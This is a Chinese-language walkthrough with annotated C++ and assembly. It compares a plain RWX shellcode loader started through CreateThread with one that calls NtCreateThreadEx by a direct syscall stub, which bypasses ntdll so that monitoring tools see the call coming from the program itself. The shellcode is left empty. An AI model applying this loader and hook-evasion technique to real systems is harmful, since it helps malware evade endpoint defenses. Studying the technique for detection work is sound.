普通调用
#include <iostream>
#include <windows.h>

/*
 * Loader variant 1 ("普通调用"): copies `shellcode` into a freshly committed
 * RWX page and starts it on a new thread through the documented Win32 API.
 * CreateThread reaches the kernel by way of ntdll, which is the call the
 * page's later monitoring comparison points at ("能看到Ntdll中NtCreateThread").
 * Note that `shellcode` is the empty string here, so `sizeof shellcode` is 1
 * (just the terminating NUL) and only that one byte is copied.
 */
int main()
{
    unsigned char shellcode[] = "";
    /* Readable, writable and executable in one allocation. The return value is
     * not checked: if VirtualAlloc fails, exec is NULL and memcpy writes through it. */
    void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, sizeof shellcode);
    /* The returned thread handle is discarded (never closed) and exec is never freed. */
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, NULL);
    Sleep(1000);  /* presumably to let the thread run before main returns */
    return 0;
}
此时的调用是非常明显的，能看到 Ntdll 中 NtCreateThread 的调用。
syscall调用
#include <iostream>
#include <Windows.h>
/*
 * Prototype for NtCreateThreadEx. EXTERN_C gives the name C linkage, so the
 * call in main below binds to the assembly stub this page defines
 * (`NtCreateThreadEx proc ... endp`) rather than to ntdll's export.
 * The parameter list presumably mirrors the undocumented native signature;
 * NOTE(review): confirm it against the Windows build being targeted.
 * main passes 0x1FFFFF as DesiredAccess and zero for the Flags, stack-size
 * and lpBytesBuffer arguments.
 */
EXTERN_C NTSTATUS NtCreateThreadEx
(
    OUT PHANDLE hThread,           /* receives the new thread handle */
    IN ACCESS_MASK DesiredAccess,
    IN PVOID ObjectAttributes,
    IN HANDLE ProcessHandle,       /* main passes the current-process pseudo-handle */
    IN PVOID lpStartAddress,       /* main passes the RWX buffer */
    IN PVOID lpParameter,
    IN ULONG Flags,
    IN SIZE_T StackZeroBits,
    IN SIZE_T SizeOfStackCommit,
    IN SIZE_T SizeOfStackReserve,
    OUT PVOID lpBytesBuffer
);
/*
 * Loader variant 2 ("syscall调用"): the same RWX copy as the first listing, but
 * the thread is created by calling NtCreateThreadEx directly. With the
 * assembly stub on this page linked in, that call executes `syscall` from
 * this module's own image instead of from ntdll ("直接通过我们的主程序进入ring0").
 * The only behavioural difference from variant 1 is therefore *where* the
 * user-to-kernel transition originates, which is what the page's procmon
 * comparison is meant to show.
 */
int main()
{
    HANDLE pHandle = NULL;
    HANDLE tHandle = NULL;
    unsigned char shellcode[] = "";   /* empty string: sizeof is 1 (the NUL byte) */
    /* Unchecked: exec is NULL if VirtualAlloc fails, and memcpy then writes through it. */
    void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, sizeof shellcode);
    /* hModule is never used afterwards; the direct call below does not go
     * through ntdll's export, so this LoadLibrary has no effect on the call path. */
    HMODULE hModule = LoadLibrary(L"ntdll.dll");
    pHandle = GetCurrentProcess();    /* pseudo-handle, not a real kernel handle */
    /* 0x1FFFFF is the value of THREAD_ALL_ACCESS. FALSE/NULL for the ULONG and
     * SIZE_T parameters compile because NULL is an integer constant in MSVC C++. */
    NtCreateThreadEx(&tHandle, 0x1FFFFF, NULL, pHandle, exec, NULL, FALSE,
                     NULL, NULL, NULL, NULL);
    Sleep(1000);                      /* presumably to let the thread run first */
    CloseHandle(tHandle);
    CloseHandle(pHandle);             /* no-op on the GetCurrentProcess pseudo-handle */
    /* No return statement: C++ main implicitly returns 0. */
}
通过汇编直接实现 NtCreateThreadEx，在函数中通过 syscall 进入 ring0
; x64 MASM stub that backs the NtCreateThreadEx prototype declared in the C++
; listing. It mirrors what an ntdll syscall stub does (r10 <- rcx, eax <-
; service number, syscall) but executes the `syscall` instruction from this
; module's image rather than from ntdll, which is the difference the page's
; procmon comparison is about.
; 0C5h is the system service number the author observed for NtCreateThreadEx
; on their Windows build. NOTE(review): service numbers differ between Windows
; builds, so this stub only matches the build it was written against; confirm
; the value before relying on it.
.code
NtCreateThreadEx proc
    mov r10, rcx        ; x64 syscall convention: first argument is also passed in r10
    mov eax, 0C5h       ; system service number (build-specific, see note above)
    syscall
    ret
NtCreateThreadEx endp
end
通过procmon进行监控
此时直接通过我们的主程序进入ring0